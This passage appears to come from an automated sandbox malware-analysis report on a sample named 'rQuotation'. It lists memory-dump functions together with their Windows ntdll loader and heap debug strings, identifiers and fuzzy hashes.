                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017322B6
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017321DE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                                                                                • Opcode ID: 31009e444f68d447fd881c98934d3139467b2a1e89a7118c06e564b3cb68f392
                                                                                                                                                                                                                                                • Instruction ID: 7a72e0d40b655e53ae059fed999362ce9b7e46ed82308d5bed4d53d6fe810438
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31009e444f68d447fd881c98934d3139467b2a1e89a7118c06e564b3cb68f392
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AA1AD319012299BDB24CF69CC94BA9B7B5BF58314F2541EDDA08AB352D730DE81CF94
                                                                                                                                                                                                                                                Function 016F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01733425, 01733432, 01733451
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01733437
                                                                                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0173342A
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01733456
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                                                                                                                                • Opcode ID: 047911be9e66d99bcace0c35d797c0318ee7c9960ae05d79449118adce4dfd95
                                                                                                                                                                                                                                                • Instruction ID: 5e455232d9684efd46bf4fd5f9c5a9a8973944eb7a04e12e49d3d60c6563c087
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 047911be9e66d99bcace0c35d797c0318ee7c9960ae05d79449118adce4dfd95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D761FF366007129BD722CF1DCC81B3AF7E5BF80A60F14856DEA969B742DB30E801CB95
                                                                                                                                                                                                                                                Function 016C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017210AE
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01721028
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0172106B
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01720FE5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                                                                                • Opcode ID: 7af1e95b30b16031cbdc8384d681865a950c7d311c269ace9eb2527cf1a540c7
                                                                                                                                                                                                                                                • Instruction ID: 840df8d32e1c7eb6bb6b6811d13d2c6e60c07bc7570c4877f4efd42e94b1998f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7af1e95b30b16031cbdc8384d681865a950c7d311c269ace9eb2527cf1a540c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A071A1715043059FCB21DF18C884FABBBA8EF54B54F50056CF9498B28AD734D589CBD6
                                                                                                                                                                                                                                                Function 016E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 016E2462
                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0172A992
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0172A9A2
                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0172A998
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                                • Opcode ID: 7b23e7ff22ba6f7b4dbf67354347449126ec35ac7ccca8a8062f30911d209200
                                                                                                                                                                                                                                                • Instruction ID: 99983b40b37cb23c1b35165569204bd2ca3b0a685cbb25ce7b03deba510e3509
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23e7ff22ba6f7b4dbf67354347449126ec35ac7ccca8a8062f30911d209200
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28312671A40212EBDB319F59DCC5FAAB7B9FB84B20F15406DF90167245D7706982CB80
                                                                                                                                                                                                                                                Function 016D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP: , xrefs: 016D3264
                                                                                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016D327D
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 016D3255
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                                • API String ID: 0-617086771
                                                                                                                                                                                                                                                • Opcode ID: da44c37db134ef2794f165e1bddb5f271440434838c30a89f362ca6ec2a52bf0
                                                                                                                                                                                                                                                • Instruction ID: 57c16d48d45b8a1e81954e73e77d88d30136eb13f438f58994d153c4095f1f4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da44c37db134ef2794f165e1bddb5f271440434838c30a89f362ca6ec2a52bf0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF92ABB1E042499FDB25CF68C854BAEBBF1FF48304F18809DE95AAB351D734A942CB51
                                                                                                                                                                                                                                                Function 017502C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                                                                                                                                                                • API String ID: 0-1670051934
                                                                                                                                                                                                                                                • Opcode ID: a76fbc1d3e03e429ec084de941bb085e910755128bc831e2595fd011d5313c7a
                                                                                                                                                                                                                                                • Instruction ID: 4ad580ae001868744ca58f0c1b47e30911e1d2285b654c4126817cfc83c14526
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a76fbc1d3e03e429ec084de941bb085e910755128bc831e2595fd011d5313c7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81227D72A047428FD7A4CF2DC99162AFBE1FBD4310F24892EFA9A87650D7B1E544CB41
                                                                                                                                                                                                                                                Function 016D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                                                                                • Opcode ID: ccdcdc03bf34e15daf78f0090f5839a88f75b3d1e59ab551ffcd1785e18d1953
                                                                                                                                                                                                                                                • Instruction ID: ca73ae40c35f5bb5181fd28640896dbf52167a3e709b37d2486d2562f32fb976
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccdcdc03bf34e15daf78f0090f5839a88f75b3d1e59ab551ffcd1785e18d1953
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F19D70A00606EFEB25CF68C894BAAB7F5FF45304F148169E5169B386D734E982CB91
                                                                                                                                                                                                                                                Function 016C1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP: , xrefs: 016C1596
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 016C1712
                                                                                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 016C1728
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                                                                                • Opcode ID: 7b4cb6f244b90b5fe489c5640adc0eea66d8f47e43b5c9f39bf47210ef67b8ae
                                                                                                                                                                                                                                                • Instruction ID: 61b9b9209596745f016fdc99c34363c13fc0f9fbb11f1fd498fa6b40cceee1d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b4cb6f244b90b5fe489c5640adc0eea66d8f47e43b5c9f39bf47210ef67b8ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7E1DE70A04255DFDB29CF2CC891ABABBE1EF46700F18845EE596CB346D734E945CB50
                                                                                                                                                                                                                                                Function 016E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                                                                                                                                • Opcode ID: 8636750cd6f338eb99a55df175e98e7b5f0f5725ad89854be8307b4ee5dfa887
                                                                                                                                                                                                                                                • Instruction ID: 6e05943f3b0c900528775311f0ec2fefbdad85957c5ed3bb4692e931a9574c69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8636750cd6f338eb99a55df175e98e7b5f0f5725ad89854be8307b4ee5dfa887
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5C291716093519FEB26CF28C844BABBBE5AF98714F048A2DF989C7341D734D805CB92
                                                                                                                                                                                                                                                Function 016BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                                                                                • Opcode ID: 794ad6c51f059b1b254af53704a583cfe3077f238e71e0cb4172e5255c96100c
                                                                                                                                                                                                                                                • Instruction ID: d63bc9dea2be72439ec9db48e55006a2f65f3c301fb171c33d83e30ff69e25c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 794ad6c51f059b1b254af53704a583cfe3077f238e71e0cb4172e5255c96100c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEA17C729516299BDB32DF68CC88BEAF7B8EF44710F1041E9E909A7250D7359E84CF50
                                                                                                                                                                                                                                                Function 016E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0172A10F
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0172A121
                                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 0172A117
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-161242083
                                                                                                                                                                                                                                                • Opcode ID: 9c58b69e76b13da5bb5b12fcee87ad0f01a86f8bd43c9628849cbbf5763bfd30
                                                                                                                                                                                                                                                • Instruction ID: 2372cb098e00b1758ab04519f087a92a8f48f74aba12cf0da7e214faf6555166
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c58b69e76b13da5bb5b12fcee87ad0f01a86f8bd43c9628849cbbf5763bfd30
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D71ED70A00206DFDB25DFA8CD84BBEB7F5FB44A14F14856DE902AB641E774A982CB50
                                                                                                                                                                                                                                                Function 016D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                                                                                                                                • Opcode ID: f7b935c9021b246377aad257655f084d51ad9dcfe9fabe8646879618557436e2
                                                                                                                                                                                                                                                • Instruction ID: 066526e9f2379c1d80ad073af5a66d6da806401e0d2f1ef0fa9bedbf3e9e7baf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7b935c9021b246377aad257655f084d51ad9dcfe9fabe8646879618557436e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE619F70A043019FDB29DF29C884BAABBE1FF45708F14855DF8598F296D771E882CB91
                                                                                                                                                                                                                                                Function 016FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017382E8
                                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017382DE
                                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017382D7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                                                                                                                                • Opcode ID: 3886cca5bf3a278e3c25d9c8f900378437ff276f44195747eba0fefa8ec4f53b
                                                                                                                                                                                                                                                • Instruction ID: 9829d809601eb48e09d38795f31395ea3db8ff78e800bd4957396ccfeb7c1b85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3886cca5bf3a278e3c25d9c8f900378437ff276f44195747eba0fefa8ec4f53b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7941E1B1545305ABC721EB68DC84FABB7E9EF44764F00892EBB49D7291E770D800CB96
                                                                                                                                                                                                                                                Function 0177C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0177C1C5
                                                                                                                                                                                                                                                • PreferredUILanguages, xrefs: 0177C212
                                                                                                                                                                                                                                                • @, xrefs: 0177C1F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                                                                                                                                • Opcode ID: 8addccb91db7664a95bb6a5d382ed8e06d1c13f6489ecd99a2f5a9e1d836c833
                                                                                                                                                                                                                                                • Instruction ID: 23588c4ede73dce9db9d0728a2e584ea07453f9123a912640a88a042dc340414
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8addccb91db7664a95bb6a5d382ed8e06d1c13f6489ecd99a2f5a9e1d836c833
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27417472D0421AEBDF12DFD8C845FEEF7B9AB19704F10406AE605F7280E7749A448B50
                                                                                                                                                                                                                                                Function 01754144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                                                                                                                                • Opcode ID: db4e9a535f4f42d16d9c2bb50fbf028d59cbefb9f2502cceb656d0774c9c0cd6
                                                                                                                                                                                                                                                • Instruction ID: f7d40d64c31f7beee59fb4bc54b70f8ee346a3f1307ccb97133192e231265002
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db4e9a535f4f42d16d9c2bb50fbf028d59cbefb9f2502cceb656d0774c9c0cd6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59412372A042588BEB22DB99CC44BADFBB5FF55380F140059DD02EB381E7B48981CB11
                                                                                                                                                                                                                                                Function 01744755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01744899
                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 0174488F
                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01744888
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                                                                                                                                • Opcode ID: 14c69ab21f9f1dfa0b0a31495d60e69611cf451dd8b23d9f07501f787e046db6
                                                                                                                                                                                                                                                • Instruction ID: 6ef0ef9ce9717d1ab649e4ff3deba230ff7f815006858e83a331fa2ca0f36d31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14c69ab21f9f1dfa0b0a31495d60e69611cf451dd8b23d9f07501f787e046db6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E841E232A446519FEB22CE2CD840B26FBE9FF49650F05056DED5AD7316E730D801EB81
                                                                                                                                                                                                                                                Function 016D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                                                                                                                                • Opcode ID: d3fe5b55a4ae67c4d5ba5b5c98a567342382f64c2342a61752c42c5939789449
                                                                                                                                                                                                                                                • Instruction ID: 869504653e86450444f82988125760e1626b9afd8b6749e0aca0ac65079fb7de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3fe5b55a4ae67c4d5ba5b5c98a567342382f64c2342a61752c42c5939789449
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C1103317181529FEB29DA18CC84FBAF7A9EF40625F18815DF407CB251DB30D882C754
                                                                                                                                                                                                                                                Function 017420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017420F3
                                                                                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 017420FA
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01742104
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                                                                                                                                • Opcode ID: 19072c649c44379082d5a305c37cb14234fc18420077d969065c630a629ff673
                                                                                                                                                                                                                                                • Instruction ID: fc0f3aa1f4ed9af7a667e701247416f3bd929d1fcd6628f1a94d0c49cab2fa80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19072c649c44379082d5a305c37cb14234fc18420077d969065c630a629ff673
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0C835680308ABE724D64CDC96FA97768EB44B64F510059F70577286D7B0A950CA51
                                                                                                                                                                                                                                                Function 016D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                                                                                • Opcode ID: 33cf0205607db8171f1048f3114e3cc8cee2ee7e3c3bc192f248fb080b86cd37
                                                                                                                                                                                                                                                • Instruction ID: ff6e8a2e98b34d78c96f70fb1b5637b40a0954da9d603d228d479456f6570b42
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33cf0205607db8171f1048f3114e3cc8cee2ee7e3c3bc192f248fb080b86cd37
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3714872E0014A9FDB11DFA8C994FAEB7F8BF18704F144069E905A7251EB34E941CBA1
                                                                                                                                                                                                                                                Function 016D52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
